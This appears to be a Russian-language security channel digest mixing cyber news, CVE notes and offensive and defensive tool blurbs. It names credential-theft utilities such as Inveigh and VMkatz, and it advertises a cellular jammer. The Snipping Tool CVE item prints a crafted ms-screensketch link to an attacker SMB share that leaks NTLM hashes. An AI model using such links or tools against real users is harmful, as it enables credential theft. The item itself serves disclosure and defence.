#news

МВД рассказало о задержанном администраторе хакерской площадки 🌐

🗣Сотрудники БСТМ МВД России совместно с коллегами из Ростовской области задержали жителя города Таганрога по подозрению в создании и администрировании одной из крупнейших международных хакерских площадок, - говорится на сайте МВД Медиа.

🗣 В начале марта Европол (полицейская служба Европейского союза) сообщил о ликвидации LeakBase в ходе международной операции в нескольких юрисдикциях. Были проведены аресты, обыски и оперативные мероприятия в отношении 37 наиболее активных пользователей площадки. 4 марта Европол взял под контроль домен форума.

Англоязычный форум LeakBase существовал с 2021 года, там хранился обширный архив взломанных баз данных, как старых, так и недавно скомпрометированных данных. В отличие от других подобных площадок она существовала в открытом интернете, а не в даркнете. По состоянию на конец 2025 года, LeakBase насчитывал более 142 тыс. зарегистрированных пользователей, 32 тыс. постов и более 215 тыс. сообщений в личных чатах, указывали в Европоле.

#defensive

ФСТЭК: Рекомендации по устранению типовых ошибок конфигурации 2026 год 🛡

По результатам анализа инцидентов информационной безопасности, проводимого в период с 2024-2025 годы, ФСТЭК России выявлены типовые ошибки конфигурации (настройки) общесистемного и прикладного программного обеспечения, которые способствуют реализации злоумышленниками угроз безопасности информации при осуществлении целевых компьютерных атак, а также разработаны рекомендации по их устранению.

Указанные рекомендации направлены на нейтрализацию угроз безопасности информации, связанных с ошибками конфигурации (настройки) общесистемного и прикладного программного обеспечения.

✔️ Документ можно найти по следующей ссылке.

#news

Мошенники начали предлагать "легкую подработку" студентам⛔️

Мошенники в апреле переключились на схему "легкой подработки" для студентов, предлагая им оформить кредит или рассрочку за процент, рассказали РИА Новости в пресс-службе платформы "Мошеловка" Народного фронта.

Аферисты публикуют объявления о "легкой подработке": нужны сотрудники для "подтверждения заказов", "перевода средств" или "оформления рассрочки на товары". Соискателю предлагают оформить на свое имя кредит или рассрочку за процент, обещая, что платить за него будет работодатель, сказали в "Мошеловке".

На деле жертва остается с кредитом и рискует стать дроппером, то есть пособником мошенников.

#pentest #tools

Inveigh ✍️

Утилита представляет из себя кроссплатформенный инструмент для проведения спуфинг-атак и реализации функционала сниффера пакетов для перехвата учётных записей/хэшей в сети .

#news

ИИ-режим поиска Google даёт миллионы неточных ответов при высокой общей точности🔩

Функция AI Overviews в поиске Google правильно отвечает примерно в 90% случаев, но из-за колоссального объёма запросов даже такой показатель оборачивается десятками миллионов некорректных ответов ежедневно. К такому выводу пришли журналисты The New York Times совместно со стартапом Oumi, протестировавших систему на бенчмарке SimpleQA от OpenAI с более чем 4000 проверяемых вопросов.

При использовании Gemini 2.5 точность составила около 85%, после перехода на Gemini 3 выросла с 85% до 91%.

В ходе проверки обнаружились проблемы с тем, как система объединяет данные из разных источников. Один из примеров — неверное определение даты превращения дома Боба Марли в музей, хотя корректные сведения присутствовали в исходных материалах.

Это указывает на сложности не с поиском информации, а с её интерпретацией и выбором нужного факта среди нескольких источников.

#pentest #cve #exploit

CVE-2026-20817 ⚙️

Уязвимость службы регистрации ошибок Windows Error Reporting Service операционной системы Windows позволяет нарушителю повысить свои привилегии в системе. Согласно BDU:2026-00482 - уязвимости присвоен высокий уровень опасности

Ознакомиться с PoC и изучить детали уязвимости можно по следующей ссылке.

#news

Новая дыра в Windows Defender грозит полным захватом системы ⚠️

◽️Исследователь, известный под псевдонимом Chaotic Eclipse и работающий на GitHub под ником Nightmare-Eclipse, сообщил о новой 0-day уязвимости в Windows Defender, которую он назвал RedSun. Ранее тот же исследователь сообщал о другой серьёзной бреши — BlueHammer.

◽️По словам исследователя, RedSun — это уязвимость, позволяющая повысить привилегии и затрагивающая встроенный защитный механизм Windows.

◽️Ирония в том, что баг якобы позволяет использовать Defender не для удаления опасных файлов, а наоборот — как инструмент, который помогает доставить вредоносную нагрузку в систему. В основе проблемы, как утверждается, лежит логическая ошибка в обработке определённых метаданных файлов.

Источник: https://www.anti-malware.ru/news/2026-04-16-111332/49724

#forensics #tools

Hayabusa 📌

Hayabusa - полезная утилита на Rust, применяемая на этапе триажа инцидентов информационной безопасности для быстрой идентификации аномалий (например, брутфорс, создание служб, изменение политик, запуск процессов из временных директорий) и снижения количества ложноположительных срабатываний.

#news

Минцифры готовит штрафы за срыв перехода на доверенные ПАК на объектах КИИ⚠️

Минцифры готовит новые штрафы для тех, кто затянет переход на доверенные программно-аппаратные комплексы на объектах критической информационной инфраструктуры. Речь идёт о поправках в КоАП, которые ведомство разрабатывает по поручению вице-премьера Дмитрия Григоренко.

Санкции хотят распространить на госорганы, госкомпании и организации с госучастием, если они не уложатся в установленные сроки перехода.

Сама логика у государства здесь довольно жёсткая: значимые объекты КИИ должны поэтапно уходить от иностранных решений и переходить на доверенные отечественные ПАК. Этот курс был закреплён ещё раньше, а финальной точкой сейчас считается 1 января 2030 года — именно к этой дате на таких объектах должен быть завершён переход.

По оценкам экспертов, переход на новые ПАК у части заказчиков идёт тяжело, а общий уровень импортозамещения на таких объектах всё ещё далёк от стопроцентного. На этом фоне желание государства подстегнуть процесс рублём выглядит вполне ожидаемо. Тем более что, по данным Минцифры, к марту 2025 года более двух третей значимых объектов КИИ госорганов и госкомпаний уже перешли на отечественное ПО.

Источник: https://www.anti-malware.ru/news/2026-04-20-111332/49764

#redteam #tools

VMkatz✏️

Утилита VMkatz предназначена для извлечения секретов (NTLM-хеши, ключи DPAPI, билеты Kerberos, LSA-секреты, NTDS.dit, ключи BitLocker) напрямую из файлов виртуальных машин (VMDK, VMSN, SAV), работая с ними на NAS или гипервизоре без необходимости выгрузки образов дисков.

📌 Может быть полезна при Red Team операциях, а также Purple Team мероприятиях.

#news

Хакеры захватывают домашние роутеры россиян и используют их для кражи данных и атак 🗣

Хакеры научились перехватывать домашние маршрутизаторы пользователей и получают под своё крыло весь интернет-трафик вместе с доступом к подключённой технике от смартфонов до систем умного дома. Через правку настроек роутера преступники подменяют DNS-записи и уводят хозяина на поддельные сайты ради кражи логинов, паролей и платёжных реквизитов.

Об этом рассказали в управлении по борьбе с противоправным использованием информационно-коммуникационных технологий МВД России.

Утечка данных составляет лишь верхушку айсберга. Взломанные устройства охотно запрягают в дальнейшие атаки на посторонние цели. Через такие роутеры расползается спам-рассылка, катятся распределённые атаки на серверы компаний и перебираются пароли к чужим учётным записям. Весь этот трафик числится исходящим от рядового пользователя, чьё железо угодило в чужие руки.

Хозяину сети подобный расклад сулит отдельную порцию неприятностей. Вся преступная суета уходит наружу с его IP-адреса, и в разбирательствах с правоохранителями крайним рискует оказаться именно он. Реальный контроль над устройством к этому моменту давно ушёл на сторону, а отмываться от обвинений приходится задним числом.

Источник: https://cisoclub.ru/hakery-zahvatyvajut-domashnie-routery-rossijan-i-ispolzujut-ih-dlja-krazhi-dannyh-i-atak/

#event

Pentest award 2026 открыл прием заявок!🔥

Каждый год у этичных хакеров появляется возможность заявить о себе, продемонстрировать свои навыки и творческий подход к решению задач в области тестирования на проникновение.

Главный приз за победу — статуэтка и макбук!
За вторые и третьи места призеры получат айфоны и смарт-часы.
Церемония награждения состоится 14 августа на Красном Октябре

Заявка на премию — это рассказ о лучшем проекте в свободной форме. Не нужно раскрывать эксплоиты, любые шаги в цепочке эксплуатации могут быть полностью анонимны, а детали могут быть скрыты, важно отразить сам подход и идею.

✔️ Отправляйте заявки на сайте, участвуйте и побеждайте!

#tools

Cybersecurity AI (CAI) 🖥

Cybersecurity AI (CAI) — это легковесная платформа с открытым исходным кодом, которая позволяет специалистам по безопасности создавать и внедрять автоматизированные решения для наступательных и оборонительных действий в ИБ на основе искусственного интеллекта.

Для тех, кто собирается тестировать данное решение, прикладываем статью, в которой автор опробовал инструмент на популярных тренировочных ресурсах и показал результаты работы.

#byapsecurity

Подавитель сотовой связи БЛ 2020 🛡

Блокиратор сотовой связи и беспроводного доступа «БЛ-2020», предназначен для предотвращения несанкционированной передачи информации по каналам сотовой связи и сетям беспроводного доступа, а также исключения возможности дистанционного управления различного рода устройствами.

Отличительные особенности:

✔️изделие имеет модульную конструкцию, которая позволяет «собирать» блокиратор, исходя из конкретных требований заказчика. Базовая поставка может включать один или два модуля изделия;
✔️изделие обеспечивает блокирование самых распространенных на сегодняшний день стандартов сотовой связи 2G,3G,4G и сетей беспроводного доступа Bluetooth, Wi-Fi, в том числе в диапазоне 5850-5950МГц;
✔️выходная мощность на антенном выходе на нагрузке 50 Ом устанавливается в диапазоне 0,5- 2,0 Вт;
✔️внешние штыревые антенны позволяют создавать круговую зону блокирования, а применение направленных антенн обеспечивают локальную зону блокирования;
✔️блокирование осуществляется постоянно в режиме «заградительная помеха». Зона блокирования в этом случае регулируется только мощностью блокирующего сигнала и применением определенных антенн.

Подробнее ✍️: https://apsecurity.ru/products/cellular-communication-blocker/bl2020

#soc #tools

OSS2Falco 🖥

Falco — это популярный инструмент с открытым исходным кодом для обеспечения безопасности облачных сред и контейнеров, который оповещает о подозрительной активности.

OSS2Falco — это набор правил Falco, преобразованных из популярных инструментов и наборов правил с открытым исходным кодом.

#cve

CVE-2026-33829 📱

CVE-2026-33829 — это уязвимость в стандартном приложении Windows «Ножницы» (Snipping Tool), раскрывающая хеши Net-NTLMv2 пользователя. Злоумышленнику достаточно заставить жертву перейти по специально созданной ссылке, чтобы перехватить данные для авторизации.

Сам же PoC демонстрирует атаку в локальной сети.

➡️ Проблема кроется в некорректной обработке URI-схемы ms-screensketch. При попытке открыть ссылку вида ms-screensketch:edit?filePath=\\server_злоумышленника\file.png происходит попытка подключения к SMB-серверу, автоматически отправляя хеш пароля.

В случае отсутствия возможности обновления системы до последней версии, наблюдайте за активностью порта 445 (если он не заблокирован на границе сети), а также проинформируйте сотрудников, что стандартные приложения вроде «Ножниц» не должны открываться по запросу из браузера или почты.